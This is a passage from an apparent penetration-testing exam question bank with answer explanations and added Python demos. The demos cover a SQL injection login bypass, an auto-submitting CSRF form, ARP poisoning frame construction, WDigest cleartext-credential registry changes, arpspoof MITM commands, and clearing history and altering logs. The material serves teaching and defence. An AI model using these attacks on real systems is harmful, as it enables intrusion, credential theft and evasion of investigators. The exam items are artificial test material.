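def setup_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", "Tr0ub4dor3"), ("alice", "hunter2")])   # constructed
    return conn


def login_legacy(conn, username: str, password: str) -> bool:
    """The vulnerable original: user input is pasted into the SQL text."""
    sql = ("SELECT 1 FROM users WHERE username='%s' AND password='%s'"
           % (username, password))
    return conn.execute(sql).fetchone() is not None


def blacklist_ok(value: str) -> bool:
    """Reject input that contains known-bad tokens (easy to bypass)."""
    return BLACKLIST.search(value) is None


def whitelist_ok(value: str) -> bool:
    """Accept only the character set the field is allowed to contain."""
    return WHITELIST.fullmatch(value) is not None


def login_filtered(conn, username: str, password: str, check) -> bool:
    """Short-term mitigation from the question: validate, then call the legacy code."""
    if not (check(username) and check(password)):
        return False
    return login_legacy(conn, username, password)


def login_parameterized(conn, username: str, password: str) -> bool:
    """The real fix: the driver sends the values separately from the SQL text."""
    row = conn.execute("SELECT 1 FROM users WHERE username=? AND password=?",
                       (username, password)).fetchone()
    return row is not None


if __name__ == "__main__":
    conn = setup_db()
    payload = "admin'/*"   # closes the string, then opens a comment that swallows the password check
    print("legacy        :", login_legacy(conn, payload, "wrong"))
    print("blacklist     :", login_filtered(conn, payload, "wrong", blacklist_ok))
    print("whitelist     :", login_filtered(conn, payload, "wrong", whitelist_ok))
    print("parameterized :", login_parameterized(conn, payload, "wrong"))
```

The payload contains none of the blacklisted tokens, so the blacklist lets it through and the resulting query becomes `... WHERE username='admin'/*' AND password='wrong'`, which authenticates as admin. The whitelist rejects it on sight because `'` and `/` are not in the approved character set. The whitelist shown is for a username field; a password field would get a length-only rule instead, since passwords legitimately contain punctuation.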
B. ADMIN$ and IPC$ PsExec is a tool that lets penetration testers run programs on remote systems over SMB on TCP port 445, which makes it extremely useful. To do so it copies its service binary (PSEXESVC.exe) into the hidden ADMIN$ share, which maps to the %SystemRoot% directory (normally C:\Windows), and then creates and starts that service through the Service Control Manager over the svcctl named pipe, which is reached through the IPC$ share. Both shares must therefore be accessible, which in turn requires file and printer sharing (the Server service, with the Workstation service on the tester's side) to be enabled on the target. With valid administrator credentials, a denied connection usually means one of those shares has been disabled or, when the account is a local administrator other than the built-in Administrator, that UAC remote restrictions are filtering the token (controlled by the LocalAccountTokenFilterPolicy registry value).
A penetration tester has successfully captured the administrator credentials of a remote Windows machine. The tester is now attempting to access the system by using PsExec. However, the tester is denied permission. What shares must be accessible for a successful PsExec connection? A. ADMIN$ and C$ B. ADMIN$ and IPC$ C. ADMIN$ and SERVICES D. IPC$ and C$
B. $ history -c The bash history keeps a record of the commands executed by a tester on the Linux command line. This lets the tester easily rerun previous commands by scrolling through the history with the up and down arrow keys. The main reason for removing command-line history from the Linux terminal is to prevent another user, or an investigator, from seeing the tester's previous commands. To clear all entries from the bash history, use the history command with the -c option: $ history -c. Two caveats apply. First, -c clears only the in-memory list of the current shell; bash writes that list to ~/.bash_history when the shell exits, so the file still holds whatever earlier sessions saved until it is overwritten (unsetting HISTFILE or pointing it at /dev/null before doing anything else prevents the current session from being written at all). Second, as with log files, clearing history is part of covering tracks and should be done only when the scope of work for the engagement allows it.
A penetration tester has successfully exploited an application vulnerability and now needs to remove the command history from the Linux session. Which command will remove the command history? A. $ cat history /clear B. $ history -c C. $ history --remove D. $ rm -f ./history
C. A spear phishing attack The Social Engineer Toolkit (SET) provides a framework for automating the social engineering process, including cloning websites, hosting the fake copy, sending spear phishing messages, and collecting the credentials victims enter. Social engineering plays an important role in many attacks, and SET is a menu-driven system for running them. Spear phishing means a phishing message aimed at a specific individual or small group rather than sent in bulk, which is what the tester does here by cloning the mail portal and mailing one target. Note that when the specific target is an executive, as in this scenario, many sources call the attack whaling; that is a subset of spear phishing, so read the question stem for the distinction it is testing.
A penetration tester has used Social Engineer Toolkit (SET) to make a copy of a company's cloud-hosted web mail portal and then sends an email to try to obtain the CEO's login credentials. This is an example of what type of attack? A. An elicitation attack B. An impersonation attack C. A spear phishing attack D. A whaling attack
B. Repeating attack In a repeating attack, the penetration tester captures the target organization's wireless network radio signal and rebroadcasts it with high gain to extend its range. In this scenario, the organization's wireless network can now be accessed by the penetration tester from the parking lot.
A penetration tester impersonates a vending machine repair person to gain access to the target organization's facility. While inside, the tester hides a wireless device behind a vending machine that captures the organization's wireless network radio signal and rebroadcasts it with high gain towards the parking lot. Which wireless exploit did the tester employ in this scenario? A. Karma attack B. Repeating attack C. Downgrade attack D. Jamming attack
D. The MAC address of the gateway ARP spoofing is a technique in which an attacker sends forged Address Resolution Protocol (ARP) messages onto a local area network. Normally, the goal is to associate the attacker's Media Access Control (MAC) address with the IP address of another host, such as the default gateway, causing any traffic meant for that IP address to be sent to the attacker instead. Impersonating the gateway yields the most information because every packet a client sends to another subnet or to the Internet passes through it, whereas impersonating a single server captures only the traffic to that server. ARP spoofing may allow an attacker to intercept data frames on a network, modify the traffic, or stop all traffic.
A penetration tester is conducting ARP spoofing against a switch. Which of the following should the tester trick to get the most information? A. The MAC address of the client B. The MAC address of the domain controller C. The MAC address of the web server D. The MAC address of the gateway
D. Stored cross-site scripting (XSS) Stored cross-site scripting (XSS) is the most dangerous type of cross-site scripting. Web applications that allow users to store data, such as comments, profiles, or support tickets, are potentially exposed to this type of attack. Stored XSS occurs when a web application accepts input from a user that may be malicious, stores it in a data store, and later renders it to other users without proper output encoding. Unlike reflected XSS, which needs each victim to open a crafted link, a stored payload executes for every user who views the affected page, including administrators, which is why it should be prioritized over the other findings listed.
A penetration tester is conducting a scan of a web application. During the review of the scan results, which of the following vulnerabilities would be the most critical and should be prioritized for exploitation? A. Clickjacking B. Expired certificate C. Full path disclosure D. Stored cross-site scripting (XSS)
D. reg add HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 Using reg add adds a new subkey or value to the registry. The syntax is as follows: reg add <KeyName> /v <ValueName> /t <DataType> /d <Data>. Setting the WDigest UseLogonCredential value to 1 under HKLM\System\CurrentControlSet tells the WDigest security package to keep a clear-text copy of credentials in LSASS memory, where Mimikatz can read them; Windows 8.1, Server 2012 R2 and later (and earlier systems with KB2871997 installed) ship with this behaviour off. The key lives under HKLM, so writing it requires administrative rights, and only users who log on after the change are affected, so the tester typically waits for the next interactive logon, or forces one, before dumping credentials. The change is also a well-known indicator: endpoint monitoring commonly alerts on writes to this value.
A penetration tester is running a phishing test and receives a shell from an internal computer that is running the Windows 10 operating system. The tester decides that he wants to use Mimikatz to perform credential harvesting. The tester wants to allow for credential caching. Which of the following registry changes would allow this? A. reg add HKLM\System\ControlSet002\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG-DWORD /d 0 B. reg add HKCU\System\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 C. reg add HKLM\Software\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 D. reg add HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
B. Conduct a LLMNR/NETBIOS-NS query. Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NetBIOS-NS) poisoning can give penetration testers a man-in-the-middle position, broadening their ability to gain access and information. When a Windows host fails to resolve a name through DNS (a mistyped share name is enough), it falls back to asking the local network via LLMNR and NetBIOS-NS broadcasts, and any host can answer. A tester on the same network answers those queries with the compromised laptop's address; the victim then authenticates to the tester, handing over a NetNTLM challenge/response that can be cracked offline or relayed to another host. NetBIOS is one of the most commonly targeted services in a Windows network because it underpins file sharing.
A penetration tester is testing the penetration of a client's network and managed to obtain access to a laptop. What would be the tester's next step to obtain credentials from the laptop? A. Brute force the user's password. B. Conduct a LLMNR/NETBIOS-NS query. C. Leverage the BeEF framework to capture credentials. D. Perform an ARP spoofing poisoning.
C. Local file inclusion E. Remote file inclusion File inclusion is an exploit in which a tester gets a web application to load and execute a file of the tester's choosing. With local file inclusion (LFI) the file already exists on the server, for example one the tester uploaded through a form field, as in this scenario, or a log file seeded with code; with remote file inclusion (RFI) the application is tricked into fetching the file from a website the tester controls. Both are a form of injection attack, and as with any injection attack, input validation on the part of the web application developer (restricting upload types, storing uploads outside the web root, and never building include paths from user input) is the key to preventing it.
A penetration tester is trying to exploit a web application used by the target organization. He uses a form field in the web application to upload a malicious executable to the web server. Which of the following describe this kind of exploit? (Choose two.) A. Cookie manipulation B. Directory traversal C. Local file inclusion D. Cross-site scripting (XSS) E. Remote file inclusion
C. arpspoof -t 192.168.10.25 192.168.10.254 A man-in-the-middle attack intercepts a communication between two systems. ARP stands for Address Resolution Protocol, and it allows hosts on a network to translate IP addresses into MAC addresses. In this scenario the attacker wants a man-in-the-middle position between the computer and its default gateway; with arpspoof this is done as arpspoof -t <victimIP> <gatewayIP>. The -t switch specifies the host to poison, and the final argument is the address the attacker claims to be. Note the distractors: 192.168.10.1 is not the gateway, and the DHCP server at 192.168.1.253 is on a different subnet and not in the path at all. Two practical points: this form poisons only the victim's cache, so the gateway-to-victim direction still flows normally unless the tester also runs the command in the other direction (or uses the -r option present in newer builds of arpspoof); and the attacker must enable IP forwarding (net.ipv4.ip_forward=1) before starting, otherwise the victim's traffic dies at the attacker and the "interception" turns into a very visible outage.
A penetration tester is trying to perform a man-in-the-middle (MITM) attack on a computer. The computer's network configuration is as follows: IP: 192.168.10.25 NETMASK: 255.255.255.0 DEFAULT GATEWAY: 192.168.10.254 DHCP: 192.168.1.253 DNS: 192.168.10.10, 192.168.20.10 Which of the following commands should the malicious user execute to perform the MITM attack? A. arpspoof -c both -r -t 192.168.10.1 192.168.10.25 B. arpspoof -c both -t 192.168.10.25 192.168.1.253 C. arpspoof -t 192.168.10.25 192.168.10.254 D. arpspoof -r -t 192.168.1.253 192.168.10.25
A. Piggybacking Piggybacking occurs when an intruder tags along with one or more authorized people through a physical barrier, such as a locking door or a turnstile. This happens without the authorized person's knowledge or consent.
A penetration tester observes that many employees of the target organization congregate outside the back door of the facility at 10 a.m. and 2 p.m. to smoke cigarettes. The next day, the tester joins the group and pretends to smoke with them. When the group finishes smoking, the tester walks through the back door behind the group. What is this technique called? A. Piggybacking B. Tailgating C. Lock bypass D. Badge cloning
A. Credential brute-forcing This is an example of a credential brute-forcing attack: guesses are submitted to the live login one after another until one succeeds. In a pure brute-force attack, every combination of letters, numbers, and special characters would be tried; building a short list of likely passwords from the target's personal interests (a dictionary attack) greatly raises the probability of success per attempt and reduces the number of tries that lockout policies and login monitoring might catch. Password cracking, by contrast, is the offline recovery of a password from a captured hash and involves no logon attempts against the target.
A penetration tester reviews social media accounts owned by the target organization's CIO and makes a list of possible passwords such as her spouse's name, pet's name, favorite sports teams, and so on. The tester tries to log on to the CIO's account using one possible password after another, trying to find one that works. What type of authentication exploit is this? A. Credential brute-forcing B. Session hijacking C. Redirect attack D. Password cracking
B. Tailgating Tailgating occurs when an intruder tags along with an authorized person through a physical barrier, such as a locking door or a turnstile. This occurs with the authorized person's knowledge and/or consent. In this example, the authorized employee held the door open for the penetration tester.
A penetration tester waits in the target organization's parking lot early in the morning until she sees an employee heading toward the front door. She walks up behind the employee while clumsily carrying several large boxes. She asks the employee to hold the door for her and is able to enter the facility. What is this technique called? A. Piggybacking B. Tailgating C. Lock bypass D. Badge cloning
A. Piggybacking Piggybacking occurs when an intruder tags along with one or more authorized people through a physical barrier, such as a locking door or a turnstile. This happens without the authorized person's knowledge or consent.
A penetration tester waits in the target organization's parking lot until she sees a large group of employees returning from lunch. She inserts herself quietly at the back of the group. The first person in the group uses his badge to unlock a secured door. The penetration tester is able to move through the door with the rest of the group. What is this technique called? A. Piggybacking B. Tailgating C. Lock bypass D. Badge cloning
D. Man-in-the-middle A replay attack is generally classified as a man-in-the-middle attack: the attacker first captures legitimate traffic, such as an authentication exchange, from a position on the path between two parties and later retransmits it to impersonate the original sender. It is distinct from a denial-of-service attack in that the aim is unauthorized access, not disruption. Protocols defend against it with per-session nonces, timestamps, and sequence numbers so that a captured message is not accepted a second time.
A replay attack is commonly categorized as which type of exploit? A. Denial of service (DoS) B. NAC bypass C. Distributed denial of service (DDoS) D. Man-in-the-middle
C. Implement an HTTP downgrade attack. A downgrade attack is one in which a tester forces a network channel to fall back to a less secure or unprotected data transmission standard. Downgrading the protocol is one component of a man-in-the-middle attack and is used to get at traffic that would otherwise be encrypted. In this scenario the evil twin already gives the tester the man-in-the-middle position, so the next step toward capturing all of the web traffic in clear text is an HTTP downgrade: the tester's proxy keeps an HTTPS connection to the real site while rewriting the links and redirects served to the victim so that the victim's browser talks plain HTTP to the tester. Be aware that this only works for sites the browser has not already pinned to HTTPS: an HSTS policy, and especially HSTS preloading in the browser, makes the victim's browser refuse the plain-HTTP connection.
An evil twin has been successfully deployed by a penetration tester and is beginning to see some victim traffic. What would be the next step that the tester would want to take to capture all of the unencrypted web traffic from the victim? A. Harvest the user credentials to decrypt traffic. B. Implement a certification authority (CA) attack by impersonating trusted CAs. C. Implement an HTTP downgrade attack. D. Perform a man-in-the-middle attack.
B. Distributed denial of service (DDoS) By sending ICMP echo requests to every host on the subnet with the router's address forged as the source, the tester causes all of those hosts to send their echo replies to the router at once. Because the flood arrives from many hosts rather than from the tester's machine alone, this is a distributed denial of service (DDoS) attack, specifically the reflected, amplified variant known as a smurf attack. Disabling responses to broadcast-addressed pings and filtering spoofed source addresses at the network edge are the standard mitigations.
During a gray box penetration test, the tester decides to stress test a critical network router. She sends thousands of ping requests addressed to all of the hosts on the subnet. However, she spoofs the source address of the requests to the IP address of the network router. As a result, the router is flooded with ICMP echo response traffic that it didn't initiate, making it difficult for it to respond to legitimate network requests. What kind of exploit is this? A. Denial of service (DoS) B. Distributed denial of service (DDoS) C. Replay attack D. NAC bypass
C. Default account settings exploit The penetration tester in this scenario exploited the firewall administrator's failure to modify the default account settings on the firewall device. Most network devices, including access points, routers, firewalls, and so on, come from the factory preconfigured with default administrative credentials. These default account settings are well documented on the Internet. If the administrator forgets to change them, then the tester can use them to gain administrative access to the device.
During a gray box penetration test, the tester discovers that one of the organization's firewalls has been configured with an administrative username of admin and a password of Admin. The tester gains administrative access to the firewall and opens holes in it. What kind of authentication exploit occurred in this scenario? A. Weak credentials exploit B. Redirect attack C. Default account settings exploit D. Credential brute-forcing
A. Relay attack This is an example of a relay attack. The attacker sits in between two hosts communicating on the network, in this case a workstation and a server. To the server, the attacker poses as the workstation. To the workstation, the attacker poses as the server.
During a gray box penetration test, the tester is able to intercept packets being transmitted from a client to a server. The tester's workstation poses as the server to the client. The tester is able to modify the data in the packets and then send it on to the server. The tester's workstation poses as the client to the server. What kind of exploit is this? A. Relay attack B. DNS cache spoofing C. Pass the hash D. Replay attack
B. Cross-site request forgery (CSRF) This is an example of a cross-site request forgery (CSRF). Because the "Remember me" option stored a persistent session cookie, the user is still logged on to the site, and the browser attaches that cookie to every request sent to the application, including one triggered by hidden HTML in an email. The password-change request therefore arrives authenticated, and since the application does not require proof that the request came from its own pages (an anti-CSRF token, a check of the Origin header, or a SameSite attribute on the cookie), it is accepted. With the password now set to a value of the tester's choosing, the tester can log on to Active Directory as a high-level employee.
During a gray box penetration test, the tester notices that the organization's human resources self-service web application uses Active Directory user accounts for authentication. It also includes a "Remember me" option on the login page. The tester sends an email message to high-level employees within the organization with the subject line "Check out this funny picture." When the email is opened, hidden HTML code actually sends an HTTP request to the self-service web application that changes the user's password. The attack relies on the saved session cookie from the site to work. What type of authentication exploit is this? A. Cross-site scripting (XSS) B. Cross-site request forgery (CSRF) C. Clickjacking D. Credential brute forcing
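The following is an added example, not code from the original page: it shows what the hidden HTML in the email actually contains and the server-side check that would have made it fail. The self-service hostname, the session values, and the request headers are constructed for the demo.

```python
# Added example (not from the original page): the forged page from the question
# and the server-side check that would have stopped it. Site name, session
# values and headers are constructed for the demo.
import hashlib
import hmac

SITE = "https://hr-selfservice.example.com"   # assumed hostname of the HR application

# What the "funny picture" mail really contains: a form aimed at the self-service
# app that the browser submits automatically, sending the victim's saved cookie.
FORGED_PAGE = """
<img src="funny.jpg">
<form id="f" action="%s/account/password" method="POST">
  <input type="hidden" name="new_password" value="Pwned!2024">
</form>
<script>document.getElementById("f").submit();</script>
""" % SITE


def issue_csrf_token(server_secret: bytes, session_id: str) -> str:
    """Token bound to the session; the real form embeds it as a hidden field."""
    return hmac.new(server_secret, session_id.encode(), hashlib.sha256).hexdigest()


def csrf_check(method: str, headers: dict, form: dict,
               server_secret: bytes, session_id: str) -> bool:
    """Allow a state-changing request only if it came from our own pages."""
    if method.upper() in ("GET", "HEAD", "OPTIONS"):
        return True                                   # no state change, nothing to forge
    source = headers.get("Origin") or headers.get("Referer", "")
    if not source.startswith(SITE):
        return False                                  # cross-site or missing origin
    token = form.get("csrf_token", "")
    expected = issue_csrf_token(server_secret, session_id)
    return token.isascii() and hmac.compare_digest(token, expected)


if __name__ == "__main__":
    secret, sid = b"server-side-secret", "sess-42"      # constructed
    forged = {"Origin": "https://attacker.example", "Cookie": "sid=sess-42"}
    legit = {"Origin": SITE, "Cookie": "sid=sess-42"}
    print(csrf_check("POST", forged, {"new_password": "Pwned!2024"}, secret, sid))
    print(csrf_check("POST", legit,
                     {"new_password": "x", "csrf_token": issue_csrf_token(secret, sid)},
                     secret, sid))
```

The forged request carries the victim's cookie but neither a valid token nor an Origin of the application's own site, so both checks fail it. Marking the session cookie SameSite=Lax or Strict stops the same attack at the browser, because the cookie is then not attached to a POST initiated from another site.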
A. ARP spoofing By sending fake ARP messages, the tester's workstation can fool client workstations into thinking it is the web server by associating the server's IP address with her workstation's MAC address. Likewise, the server can be fooled into thinking her workstation is the end user's workstation by doing the same thing, sending a fake ARP message to the server mapping the client's IP address to her workstation's MAC address.
During a gray box penetration test, the tester wants to implement a downgrade man-in-the-middle attack to reduce the security of web browser sessions from TLS to SSL. What exploit can the attacker use to trick client workstations into thinking her workstation is the web server and vice versa? A. ARP spoofing B. Replay attack C. Pass the Hash D. SYN attack
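Three of the questions above (the ARP spoofing target, the arpspoof command, and the TLS downgrade setup) rest on the same frame, so here is one added example that serves all three; it is not code from the original page or from the arpspoof tool. It builds the two unsolicited ARP replies a tester emits to sit between the victim and the gateway and parses them back to show what each side's ARP cache learns. The IP addresses are the ones from the arpspoof question; the MAC addresses are constructed, and nothing is transmitted.

```python
# Added example (not from the original page): the frames arpspoof sends.
# Builds the two unsolicited ARP replies a tester would emit to sit between
# the victim and the gateway, and parses them back to show what each side's
# ARP cache learns. MAC and IP addresses are constructed; nothing is sent.
import struct

ETH_P_ARP = 0x0806
ARP_REPLY = 2


def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def ip_bytes(ip: str) -> bytes:
    return bytes(int(o) for o in ip.split("."))


def fmt_mac(b: bytes) -> str:
    return ":".join("%02x" % x for x in b)


def fmt_ip(b: bytes) -> str:
    return ".".join(str(x) for x in b)


def build_arp_reply(dst_mac, src_mac, claimed_ip, target_mac, target_ip) -> bytes:
    """Ethernet + ARP reply saying 'claimed_ip is at src_mac', aimed at target."""
    eth = mac_bytes(dst_mac) + mac_bytes(src_mac) + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)   # Ethernet, IPv4, hlen, plen, op
    arp += mac_bytes(src_mac) + ip_bytes(claimed_ip)          # sender pair: the lie
    arp += mac_bytes(target_mac) + ip_bytes(target_ip)        # target pair
    return eth + arp


def parse_arp(frame: bytes) -> dict:
    """Decode an Ethernet/ARP frame into the fields a receiving host would cache."""
    if struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        raise ValueError("not an ARP frame")
    op = struct.unpack("!H", frame[20:22])[0]
    return {"op": op,
            "sender_mac": fmt_mac(frame[22:28]), "sender_ip": fmt_ip(frame[28:32]),
            "target_mac": fmt_mac(frame[32:38]), "target_ip": fmt_ip(frame[38:42])}


def poison_pair(attacker_mac, victim_mac, victim_ip, gw_mac, gw_ip):
    """Both directions, as arpspoof -r (or two -t runs) would do."""
    to_victim = build_arp_reply(victim_mac, attacker_mac, gw_ip, victim_mac, victim_ip)
    to_gateway = build_arp_reply(gw_mac, attacker_mac, victim_ip, gw_mac, gw_ip)
    return to_victim, to_gateway


if __name__ == "__main__":
    # IPs from the arpspoof question, MACs constructed.
    to_victim, to_gw = poison_pair("00:11:22:33:44:55",                    # attacker
                                   "aa:bb:cc:dd:ee:01", "192.168.10.25",   # victim
                                   "aa:bb:cc:dd:ee:fe", "192.168.10.254")  # gateway
    print(parse_arp(to_victim))   # victim now maps 192.168.10.254 -> attacker MAC
    print(parse_arp(to_gw))       # gateway now maps 192.168.10.25 -> attacker MAC
    # Sending needs root and a raw socket, e.g. on Linux:
    #   s = socket.socket(socket.AF_PACKET, socket.SOCK_RAW); s.bind(("eth0", 0)); s.send(to_victim)
    # repeated every second or so, with ip_forward=1 on the attacker so the
    # victim keeps connectivity while the traffic passes through.
```

Each frame is 42 bytes: a 14-byte Ethernet header and a 28-byte ARP body. The "lie" is entirely in the sender pair, which is what the receiving host writes into its cache; the reply is unsolicited, and most stacks accept it anyway, which is the whole weakness that dynamic ARP inspection on the switch exists to close.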
B. Recommend they use SSL-enabled LDAP on port 636. You should recommend they use LDAPS on port 636 to manage user accounts. LDAPS wraps the LDAP session in SSL/TLS (modern deployments negotiate TLS; the name is historical). Standard LDAP on port 389 transmits data on the network as clear text, which means the administrative credentials used to bind to the directory service, as well as the credentials of the users being managed, can be read by anyone capturing traffic on the path. An equivalent fix is to keep port 389 but require StartTLS, which upgrades the plain connection to TLS before any bind; either way, the server should be configured to reject simple binds that arrive unencrypted.
During a penetration test, you discover that an administrator is using clear-text LDAP on port 389 to update user accounts in their LDAP-compliant directory service, including user credentials. What should you recommend the client do to fix this? A. Recommend they discontinue using LDAP clients to manage user accounts. B. Recommend they use SSL-enabled LDAP on port 636. C. Recommend they switch to a non-LDAP directory service. D. Recommend they use SSH-enabled LDAP on port 22.
A. A clickjacking attack Clickjacking is when a tester loads the target page inside an invisible frame on a page the tester controls and overlays it with visible content, so that a user who believes they are clicking a button or link on the tester's page is actually clicking a control on the framed target page. The tester is "hijacking" clicks and routing them to another page. It is a browser-level issue that affects a variety of browsers and platforms, and it relies on the target site allowing itself to be framed. The Content-Security-Policy header's frame-ancestors directive (or the older X-Frame-Options header) is what tells the browser not to render the site inside another origin's frame; its absence is therefore the scan result that points the tester at clickjacking next.
During a web application penetration test, a penetration tester observes that the content security policy header is missing. What type of attack would the tester most likely perform next? A. A clickjacking attack B. A command injection attack C. A directory traversal attack D. A remote file inclusion attack
A. It is a server. The <20> suffix on a UNIQUE NetBIOS name is registered by the File Server service, so DEV-1 is offering SMB shares and is most likely a Windows server (or a Linux host running Samba). Strictly, any Windows host with file and printer sharing enabled registers <20>, so confirm the role with other evidence before reporting it. Note also what the command actually shows: nbtstat -c dumps the local machine's NetBIOS name cache, that is, names it has recently resolved, rather than polling the network; the Life [sec] column is the remaining cache lifetime, and nbtstat -A <ip> queries a specific remote host's full name table.
During the information gathering phase of a gray box penetration test, you run the NBTSTAT -c command on the local network. One of the lines in the output reads as follows: Name Type Host Address Life [sec] ------------------------------------------------------------ DEV-1 <20> UNIQUE 10.0.0.3 517 What do you know about the DEV-1 host? A. It is a server. B. It is a workstation. C. It is a router. D. It is a wireless device.
B. It is a workstation. The <00> suffix on a UNIQUE NetBIOS name is registered by the Workstation service. Based on this output, PROD-9 is most likely a Windows workstation (or a Linux host running Samba). Keep in mind that every Windows host, servers included, registers a <00> name; what marks PROD-9 as a workstation here is that the cache shows no <20> (File Server service) entry for it, so it is not offering shares. The same suffix on a GROUP name is the domain or workgroup name rather than a host.
During the information gathering phase of a gray box penetration test, you run the NBTSTAT -c command on the local network. One of the lines in the output reads as follows: Name Type Host Address Life [sec] ------------------------------------------------------------ PROD-9 <00> UNIQUE 10.0.0.132 517 What do you know about the PROD-9 host? A. It is a server. B. It is a workstation. C. It is a router. D. It is a wireless device.
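Both nbtstat questions above turn on reading the <xx> suffix correctly, so here is one added example covering both; it is not code from the original page. It parses the name-table lines that nbtstat prints (whether from -c, -n or -A <ip>) and translates each suffix into the service it advertises. The sample output is constructed to match the two questions; real output has the same columns.

```python
# Added example (not from the original page): parse the name-table lines that
# nbtstat prints (from -c, -n or -A <ip>) and translate the <xx> suffix into
# the service it advertises. Sample output below is constructed to match the
# two questions; real output has the same columns.
import re

# Suffix meanings for the two NetBIOS name types (common subset).
UNIQUE_SUFFIX = {
    0x00: "Workstation Service (registered by every Windows host)",
    0x03: "Messenger Service",
    0x20: "File Server Service (SMB shares offered)",
    0x1B: "Domain Master Browser (PDC emulator)",
    0x1D: "Master Browser",
}
GROUP_SUFFIX = {
    0x00: "Domain or workgroup name",
    0x1C: "Domain Controllers",
    0x1E: "Browser service elections",
}

LINE = re.compile(r"^\s*(?P<name>\S+)\s+<(?P<suffix>[0-9A-Fa-f]{2})>\s+(?P<type>UNIQUE|GROUP)"
                  r"(?:\s+(?P<addr>\d+\.\d+\.\d+\.\d+))?")


def parse_nbt_table(text: str) -> list:
    """Return one dict per name entry; header and separator lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        rows.append({"name": m["name"], "suffix": int(m["suffix"], 16),
                     "type": m["type"], "addr": m["addr"]})
    return rows


def describe(entry: dict) -> str:
    """Human-readable meaning of a parsed entry's suffix."""
    table = UNIQUE_SUFFIX if entry["type"] == "UNIQUE" else GROUP_SUFFIX
    return table.get(entry["suffix"], "unknown suffix <%02X>" % entry["suffix"])


def file_servers(text: str) -> list:
    """Hosts advertising <20> UNIQUE, i.e. running the File Server service."""
    return [e["name"] for e in parse_nbt_table(text)
            if e["type"] == "UNIQUE" and e["suffix"] == 0x20]


SAMPLE = """\
    Name              Type       Host Address    Life [sec]
    ------------------------------------------------------------
    DEV-1          <20>  UNIQUE      10.0.0.3        517
    DEV-1          <00>  UNIQUE      10.0.0.3        517
    PROD-9         <00>  UNIQUE      10.0.0.132      517
    CORP           <1C>  GROUP       10.0.0.5        600
"""   # constructed to match the two questions

if __name__ == "__main__":
    for e in parse_nbt_table(SAMPLE):
        print("%-8s <%02X> %-6s %-12s %s" % (e["name"], e["suffix"], e["type"],
                                             e["addr"], describe(e)))
    print("file servers:", file_servers(SAMPLE))
```

Running it on the sample shows why DEV-1 is the server: it registers both <00> and <20>, while PROD-9 has only the Workstation service entry. The <1C> GROUP line is the kind of bonus a tester looks for in the same output, since it names a domain controller.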
A. Authority Social engineering targets people instead of computers and relies on individuals or groups breaking security procedures, policies, and rules. Social engineering can be done in person, over the phone, by text messages, or by email. In this scenario, the attacker used the social engineering principle of authority. Authority follows the belief that people will tend to obey authority figures, even if they are asked to perform objectionable acts.
Several employees of an organization were recently victims of a phishing attack. They received an email that appeared to come from the company president. The email stated that the employees would receive disciplinary action if they did not do as the emailed instructed and click a link in the message. What principles of social engineering did the attacker use? A. Authority B. Fear C. Scarcity D. Social proof
C. Vishing Vishing (voice phishing) is social engineering over the phone system. Phishing attacks target sensitive information such as passwords, usernames, or credit card information. Vishing works like phishing but is carried out using voice technology. A vishing attack can be conducted by voice email, voice over IP (VoIP), or landline or cellular telephone. In this scenario, since the CEO is receiving telephone calls, this is a vishing attack.
The president of an organization reported that he has been receiving a number of phone calls from someone claiming to be with the help desk department. This individual is asking for the CEO to verify his network authentication credentials because his computer is broadcasting across the network. What type of attack is taking place? A. Impersonation B. Interrogation C. Vishing D. Whaling
C. Hide any files that you copied to the system. D. Alter log entries created when you compromised the system. In the process of covering your tracks, you should consider taking actions such as removing or hiding any files you copied to the system. You could also consider altering any log entries that were created when you compromised the system. However, there are two things to keep in mind when modifying log files. First, make sure the scope of work for the penetration test allows you to modify log files. Sometimes it will not be allowed. Second, you should not delete all the log entries. This would be a dead giveaway to a defender that you have compromised the system.
You are performing a gray box penetration test. You have successfully compromised a target computer system. You now need to cover your tracks to hide the evidence of your actions. Which techniques could you employ? (Choose two.) A. Create a text file in the administrator's home directory named Youvebeenhacked.txt. B. Delete all entries from all log files. C. Hide any files that you copied to the system. D. Alter log entries created when you compromised the system.
B. Assigning the SGID special permission C. Assigning the SUID special permission Assigning an executable on Linux the SUID permission makes it run with the effective user ID of the file's owner rather than of the user who launched it. If the owner is the root user, the process executes with root's superuser permissions. Likewise, assigning an executable the SGID permission makes it run with the effective group ID of the owning group; if that group is root, it runs with the root group's permissions. Enumerating root-owned SUID binaries is therefore an early step in Linux privilege escalation, since any such binary that can be made to run a shell, read or write arbitrary files, or load a library of the attacker's choosing yields root. The sticky bit, by contrast, only restricts who may delete files in a shared directory such as /tmp and confers no extra privilege, and mounting user-writable filesystems with the nosuid option is the standard defence against SUID files planted by an attacker.
You need to use privilege escalation on a Linux system during a penetration test. Which features of the operating system can be used to allow an executable to be run with superuser-level permissions? (Choose two.) A. Running it as administrator B. Assigning the SGID special permission C. Assigning the SUID special permission D. Running it from a child BASH shell session E. Assign the sticky bit permission
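As an added example (not code from the original page), the block below classifies the special permission bits in a raw file mode and walks a directory tree for SUID/SGID binaries, which is the first enumeration step for this class of escalation. The starting directory is an assumption; on a target you would run it as the unprivileged user against / and look for root-owned hits.

```python
# Added example (not from the original page): classify the special permission
# bits on a file mode and walk a directory tree for SUID/SGID binaries, which is
# the first thing to enumerate for this class of escalation. The root path is
# an assumption; run it as an unprivileged user against / on the target.
import os
import stat


def special_bits(mode: int) -> set:
    """Return the subset of {'suid', 'sgid', 'sticky'} set in a raw st_mode."""
    found = set()
    if mode & stat.S_ISUID:
        found.add("suid")
    if mode & stat.S_ISGID:
        found.add("sgid")
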